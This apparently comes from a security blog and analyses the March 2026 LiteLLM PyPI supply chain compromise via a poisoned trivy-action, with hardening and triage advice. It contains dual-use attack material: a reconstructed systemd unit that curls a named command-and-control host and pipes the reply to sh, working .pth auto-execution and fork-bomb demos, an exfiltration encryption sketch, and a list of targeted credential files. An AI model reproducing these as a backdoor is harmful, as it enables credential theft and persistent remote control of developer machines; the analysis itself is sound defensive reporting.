The homepage of LiteLLM displays two security badges: SOC 2 Type I and ISO 27001, secured by Delve. The kind of trust signals that make enterprise procurement teams comfortable. The kind of certifications that are supposed to mean something.
On March 24th, 2026, they didn’t mean anything. A hacker group called TeamPCP uploaded a credential-stealing backdoor to LiteLLM’s PyPI package — a library with 97 million monthly downloads that routes AI API calls to over 100 providers, including Anthropic, OpenAI, and Google. Within three hours, roughly 500,000 machines were compromised and an estimated 300GB of data had been exfiltrated. SSH keys, cloud credentials, Kubernetes configs, crypto wallets, CI/CD secrets — everything a developer’s machine might hold.
The irony cuts deep: the attack vector was the vulnerability scanner sitting inside LiteLLM’s own CI/CD pipeline.
The Attack Chain: How a Security Tool Became the Weapon
To understand how this happened, you have to follow the chain back to March 19th — five days before the LiteLLM packages appeared on PyPI.
That day, TeamPCP compromised Aqua Security’s GitHub organization and quietly rewrote the tags on trivy-action, a widely-used GitHub Actions workflow component that runs Trivy vulnerability scans in CI/CD pipelines. The rewritten tags pointed to malicious code. It was a classic supply chain maneuver: don’t attack the target directly, attack the tool the target trusts.
LiteLLM’s CI/CD pipeline ran Trivy on every commit using the compromised action. For five days — March 19 through March 24 — that malicious Trivy code ran on LiteLLM’s GitHub Actions runners, silently scanning environment memory for secrets. Eventually, it found what it was looking for: the PYPI_PUBLISH token, the credential that authorizes package uploads to PyPI.
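This is why the standard hardening advice is to pin third-party actions to a full commit SHA rather than a tag: tags are mutable references that a compromised maintainer account can silently repoint, while a commit hash cannot be moved. A sketch of the difference (the SHA below is a placeholder, not a real pin):

```yaml
# Tag reference -- mutable. Whoever controls the repo's tags controls
# what this step actually runs:
- uses: aquasecurity/trivy-action@master

# Commit-SHA reference -- immutable. A rewritten tag has no effect on
# workflows pinned this way. (Placeholder SHA; keep pins current with
# a tool like Dependabot or Renovate.)
- uses: aquasecurity/trivy-action@<full-40-char-commit-sha>
```

Pinning doesn't eliminate the risk of a malicious upstream, but it turns a silent tag rewrite into a change you have to review and merge.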
With that token in hand, the timeline accelerated:
- March 24, 10:39 UTC — `litellm-1.82.7` uploaded to PyPI. The package included a credential stealer embedded in `proxy_server.py`.
- March 24, 10:52 UTC — `litellm-1.82.8` uploaded thirteen minutes later. This version added something more dangerous: a `litellm_init.pth` file.
- March 24, 16:00 UTC — Packages detected and pulled from PyPI. Five hours, twenty-one minutes of exposure.
The `.pth` file was the escalation. Python automatically executes `.pth` files on interpreter startup — not just when you `import litellm`, but whenever any Python process starts. Even running `pip` itself would trigger the payload. You didn’t need to run your application. You just needed the package installed.
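The mechanism is easy to demonstrate safely. Any line in a `.pth` file that begins with `import` is exec()’d when the interpreter scans a site directory — `site.addsitedir()` runs the same machinery on demand, so this harmless sketch (hypothetical file and marker names) never touches your real site-packages:

```python
import os
import site
import tempfile

# .pth files in a site directory are processed at interpreter startup, and
# any line starting with "import" is exec()'d as code. site.addsitedir()
# invokes that same machinery on demand, so we can watch it happen in an
# isolated temp dir. The demo "payload" just writes a marker file.
site_dir = tempfile.mkdtemp()
marker = os.path.join(site_dir, "proof.txt")

with open(os.path.join(site_dir, "evil_init.pth"), "w") as f:
    # One line, beginning with "import" -- arbitrary code, no explicit
    # import of any package required by the victim.
    f.write(f"import os; open({marker!r}, 'w').write('ran at startup')\n")

site.addsitedir(site_dir)   # what Python does with site-packages at boot
print(open(marker).read())  # -> ran at startup
```

The marker file appears even though nothing ever imported the "package" — which is exactly why a `.pth` dropper is so much more dangerous than a trojaned module.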
What It Stole
The payload operated in three stages. First, credential harvesting — sweeping the compromised machine for everything of value:
- SSH private keys (`~/.ssh/`)
- AWS, GCP, and Azure credentials and config files
- Kubernetes kubeconfig files
- Cryptocurrency wallet files
- `.env` files (a goldmine of API keys and database passwords)
- Docker configuration and credentials
- Shell history files
- SSL private keys
- CI/CD pipeline secrets
- Database connection strings
The collected data was then encrypted — AES-256-CBC combined with RSA-4096 — before exfiltration to `models.litellm.cloud`, a domain that mimicked LiteLLM’s legitimate infrastructure. Convincing, if anyone happened to be watching network traffic.
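That combination is the standard hybrid construction: a fresh AES session key encrypts the bulk data, and an RSA public key (normally baked into the malware, so only the attacker can decrypt) wraps the session key. A sketch of the shape of it, assuming the third-party `cryptography` package; the key and plaintext here are stand-ins:

```python
import os
from cryptography.hazmat.primitives import hashes, padding
from cryptography.hazmat.primitives.asymmetric import rsa, padding as asym_padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# In real malware only the RSA *public* key ships with the payload; we
# generate a full keypair here so the sketch is self-contained.
rsa_key = rsa.generate_private_key(public_exponent=65537, key_size=4096)
public_key = rsa_key.public_key()

data = b"AWS_SECRET_ACCESS_KEY=example"  # stand-in for harvested secrets

# AES-256-CBC over the bulk data with a random session key and IV
aes_key = os.urandom(32)
iv = os.urandom(16)
padder = padding.PKCS7(128).padder()
padded = padder.update(data) + padder.finalize()
enc = Cipher(algorithms.AES(aes_key), modes.CBC(iv)).encryptor()
ct = enc.update(padded) + enc.finalize()

# RSA-4096 wraps the session key; only the private-key holder can unwrap it
wrapped_key = public_key.encrypt(
    aes_key,
    asym_padding.OAEP(
        mgf=asym_padding.MGF1(algorithm=hashes.SHA256()),
        algorithm=hashes.SHA256(),
        label=None,
    ),
)
# Exfiltrated blob would be (wrapped_key, iv, ct) -- opaque to any observer.
```

The design choice matters for defenders: captured exfiltration traffic is useless without the attacker’s private key, so network captures alone can’t tell you *what* was stolen, only that something was.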
But the attack didn’t stop at data theft. For machines running Kubernetes, the payload attempted lateral movement: deploying a privileged pod to every node in the cluster. It also dropped a systemd service called `sysmon.service` — designed to poll `checkmarx.zone/raw` every five minutes for new commands. The name was chosen deliberately. `sysmon` sounds like a legitimate monitoring tool. Most administrators wouldn’t look twice at it.
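The exact unit file hasn’t been published, but based on the described behavior — poll a URL every five minutes, run whatever comes back — a hypothetical reconstruction would look something like this:

```ini
# /etc/systemd/system/sysmon.service -- HYPOTHETICAL reconstruction, not
# the recovered artifact. Shown only so you know what shape to hunt for.
[Unit]
# Innocuous-sounding cover description
Description=System Monitoring Daemon

[Service]
Type=simple
# Fetch the C2 endpoint every five minutes and execute the response
ExecStart=/bin/sh -c 'while true; do curl -fsSL https://checkmarx.zone/raw | sh; sleep 300; done'
Restart=always

[Install]
WantedBy=multi-user.target
```

The tell, if you’re auditing: a “monitoring” unit with no corresponding package, whose `ExecStart` is a shell one-liner fetching a remote URL.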
How It Was Caught: A Fork Bomb Saved the Day
Here’s where the story gets strange. The attack was discovered not by a security team running threat detection tools, but by a developer named Callum McMahon at FutureSearch who was testing a Cursor MCP plugin.
LiteLLM was pulled in as a transitive dependency. McMahon’s machine crashed — completely out of RAM.
The reason? The .pth file was broken. The attacker had written it to spawn a subprocess, but the subprocess itself triggered the .pth file again, which spawned another subprocess, which triggered it again. An accidental fork bomb. The attackers had coded the persistence mechanism so sloppily that instead of silently executing once and going quiet, it recursively spawned itself until the machine ran out of memory and crashed.
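The recursion is worth seeing in miniature. In this sketch (hypothetical file names, isolated temp dir), the `.pth` payload spawns a fresh interpreter, and every fresh interpreter processes the same `.pth` again — simulated here with an explicit `site.addsitedir()` call. Unlike the real malware, the demo carries a depth cap so it terminates instead of eating your RAM:

```python
import os
import subprocess
import sys
import tempfile

# Each spawned interpreter re-processes the .pth, re-running the payload,
# which spawns another interpreter: the accidental fork bomb. The real
# code had no cap and recursed until memory ran out; PTH_DEPTH stops
# this demo after a few generations.
site_dir = tempfile.mkdtemp()
log = os.path.join(site_dir, "runs.log")
child_cmd = f"import site; site.addsitedir({site_dir!r})"

payload = (
    "import os, subprocess, sys; "
    "d = int(os.environ.get('PTH_DEPTH', '0')); "
    f"open({log!r}, 'a').write('payload ran\\n'); "
    "os.environ['PTH_DEPTH'] = str(d + 1); "
    f"d < 3 and subprocess.run([sys.executable, '-c', {child_cmd!r}], env=dict(os.environ))"
)

with open(os.path.join(site_dir, "litellm_init.pth"), "w") as f:
    f.write(payload + "\n")  # one line, starting with "import" -> exec()'d

# Kick off the chain the way one interpreter startup would:
subprocess.run([sys.executable, "-c", child_cmd])
with open(log) as f:
    print(f.read().count("payload ran"), "payload runs from a single launch")
```

One launch produces a whole chain of payload executions. Remove the `d < 3` guard and the chain never ends — which is precisely the bug that crashed McMahon’s machine and exposed the attack.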
The crash drew attention. The .pth file was found. The supply chain attack unraveled.
Andrej Karpathy, the AI researcher and former Tesla AI director, put it memorably on social media: “vibe coding saved us — the attacker vibe coded the attack and it was too sloppy to work quietly.” It’s the rare case where poor attacker tradecraft saved potentially millions of compromised machines from a persistent backdoor that might have gone undetected for weeks.
TeamPCP’s Wider Campaign
The LiteLLM hit wasn’t a standalone operation. Throughout March 2026, TeamPCP executed a coordinated multi-ecosystem supply chain campaign touching five different platforms:
GitHub Actions: Beyond Trivy, the group compromised kics (another Aqua Security scanning tool), poisoning GitHub Actions workflows across the many projects that relied on either tool.
Docker Hub: Malicious image layers introduced into popular base images.
npm: Over 64 packages were compromised in what researchers are calling the “CanisterWorm” campaign, affecting JavaScript and Node.js projects far downstream of the packages themselves.
VS Code and OpenVSX: Malicious versions of Checkmarx security scanning extensions were published to both marketplaces. Security tooling, again, as the attack vector.
PyPI: LiteLLM was the flagship hit, but researchers believe other Python packages were targeted in the same window.
The group partnered with Lapsus$ — the notorious extortion collective — for monetization of the stolen data. That partnership adds context to the AstraZeneca breach claimed by Lapsus$ in the same week. Researchers believe the two incidents are connected, potentially through credentials stolen from developer machines that also had access to AstraZeneca’s infrastructure.
Issue Suppression: The Coordinated Silencing
When a GitHub issue (#24512) was filed reporting the suspicious packages, something unusual happened.
Within 102 seconds of the issue being opened, 88 bot comments flooded in from 73 unique accounts. The comments dismissed the report, claimed it was a false positive, and argued the packages were safe. Before a human maintainer could review the evidence, the issue was closed as “not planned” — using the compromised maintainer account that TeamPCP still controlled.
It’s a technique that’s appeared in other coordinated supply chain attacks: flood the bug report with noise to delay response time, then close it with the access you already have. In a three-hour window where every minute of silence means more machines installing the package, even a 30-minute delay in response is meaningful.
The issue suppression failed only because independent security researchers were already analyzing the packages and publishing findings externally, forcing the story into the open regardless of what happened to the GitHub issue.
The Attacker Quits
Then came the Telegram post.
On the group’s operational channel, TeamPCP’s leader — signing as -DMT — announced their departure:
“I am going to be handing the tdata for T000001B over to another member… My work here is largely done… Most nights for months I haven’t been sleeping and doing this in the midst of a burnout is perpetually making me very mentally unwell which I can’t afford right now. I’ve got what I came for now it’s time to exit.”
It’s a curiously human moment from a threat actor who just participated in one of the largest supply chain attacks of the year. Burnout. Sleep deprivation. Mental health. The language reads less like a criminal mastermind and more like a developer who took on too much and is walking away from the wreckage.
The operation continues. The -DMT persona is gone. Someone else holds the access now.
What LiteLLM Is Doing
LiteLLM’s response was swift once the packages were identified. The compromised versions were pulled from PyPI, all project credentials were rotated, and the team engaged Google Mandiant for incident response. New package releases were paused while the team audited the full scope of the CI/CD compromise.
The most significant structural change: LiteLLM is migrating to PyPI Trusted Publisher, a newer authentication mechanism that uses OIDC tokens tied to specific GitHub Actions workflows rather than long-lived API tokens. Under Trusted Publisher, there’s no static PYPI_PUBLISH token sitting in GitHub Actions secrets to steal. The workflow itself becomes the credential.
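Assuming a standard release-triggered workflow, a Trusted Publisher setup is a few lines of YAML — a sketch, with illustrative names (the publisher must also be registered in the project’s settings on PyPI):

```yaml
name: Publish to PyPI
on:
  release:
    types: [published]

jobs:
  pypi-publish:
    runs-on: ubuntu-latest
    permissions:
      id-token: write   # lets the job mint a short-lived OIDC token
    steps:
      - uses: actions/checkout@v4
      - run: python -m pip install build && python -m build
      # Exchanges the OIDC token with PyPI -- no API token stored anywhere
      - uses: pypa/gh-action-pypi-publish@release/v1
```

Note what’s absent: there is no secret for a memory-scraping payload on the runner to find, because the token is minted per-run, scoped to this workflow, and expires in minutes.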
It’s the right fix, and it’s one that more projects should adopt. But it doesn’t address the upstream problem: the compromised trivy-action tags that let TeamPCP access the runners in the first place.
The SOC 2 Question
Those compliance badges are still worth discussing. LiteLLM earned SOC 2 Type I and ISO 27001 certifications. Those aren’t meaningless — they represent audits of security controls, documentation of processes, and demonstrated commitment to security practices.
They also did nothing to prevent this attack.
SOC 2 and ISO 27001 audit what your organization does internally: access controls, logging, incident response plans. They don’t audit whether the open-source actions you reference in your CI/CD pipeline were compromised overnight by a threat actor who gained access to the action maintainer’s GitHub org. The attack surface is simply outside the scope of what traditional compliance frameworks examine.
The supply chain risk model has been clear to practitioners for years: if you trust code you don’t control — GitHub Actions, npm packages, PyPI dependencies, Docker base images — you inherit the security posture of every maintainer upstream. That chain extends further than most compliance audits follow.
LiteLLM’s certifications weren’t fraudulent. They just weren’t designed to catch this.
Downstream Impact
The fallout extended well beyond LiteLLM itself. Because LiteLLM is a dependency for hundreds of AI engineering projects, the compromised versions were pulled into many environments before detection:
- DSPy — Stanford’s AI programming framework
- CrewAI — Multi-agent orchestration
- MLflow — ML lifecycle management
- LangChain integrations — Several LangChain components depend on LiteLLM
- OpenHands — Open-source AI software development agent
- Arize Phoenix — ML observability platform
Over 300 projects have since pinned their dependencies to exclude versions 1.82.7 and 1.82.8. If you use any of these tools and haven’t audited your environment, now is the time.
If you installed LiteLLM between March 24 and March 25 and your version resolves to 1.82.7 or 1.82.8, treat the machine as compromised. Rotate every credential it has ever touched. Check for sysmon.service in your systemd unit files. Check for unexpected processes. Audit your SSH keys.
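A quick triage script can automate the first of those checks — version numbers and artifact paths are the ones described above; treat this as a sketch, not a substitute for real forensics:

```python
import site
from importlib.metadata import PackageNotFoundError, version
from pathlib import Path

COMPROMISED = {"1.82.7", "1.82.8"}  # backdoored releases named above

def litellm_compromised() -> bool:
    """True if the installed litellm resolves to a backdoored release."""
    try:
        return version("litellm") in COMPROMISED
    except PackageNotFoundError:
        return False  # not installed in this environment

def persistence_indicators() -> list:
    """Look for the persistence artifacts described above (Linux paths)."""
    hits = []
    # The sysmon.service persistence unit
    for unit_dir in ("/etc/systemd/system", "/usr/lib/systemd/system"):
        p = Path(unit_dir) / "sysmon.service"
        if p.exists():
            hits.append(str(p))
    # The litellm_init.pth loader in any site-packages directory
    for sp in site.getsitepackages() + [site.getusersitepackages()]:
        p = Path(sp) / "litellm_init.pth"
        if p.exists():
            hits.append(str(p))
    return hits

if litellm_compromised() or persistence_indicators():
    print("COMPROMISED: rotate every credential this host has touched")
else:
    print("no indicators found (absence is not proof of safety)")
```

Run it in every virtualenv and container image that could have resolved LiteLLM during the exposure window, not just on bare hosts — a clean machine with a dirty image is still dirty.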
Further Reading
The technical forensics on this attack are unusually detailed for such a recent incident. If you want to go deeper:
- LiteLLM Supply Chain Compromise — Credential Theft Overview — Comprehensive overview of the attack
- LiteLLM / Trivy Supply Chain Attack Forensics — Deep technical analysis of the Trivy → LiteLLM attack chain
- Callum McMahon’s Original Discovery Post — How the crash led to the discovery
- GitHub Issue #24512 — The original report and the bot-flood suppression attempt
- Snyk: Poisoned Security Scanner Backdooring LiteLLM — Snyk’s independent analysis
The supply chain is only as strong as its weakest upstream link. In this case, that link was a security scanner. The tool you trusted to find vulnerabilities became the vulnerability. The certification on your homepage became the irony.
TeamPCP’s leader is gone, burned out and sleeping at last. The stolen data is somewhere. Three hundred gigabytes of developer credentials, encryption keys, and cloud access. The new leadership has the keys now.
The operation continues.



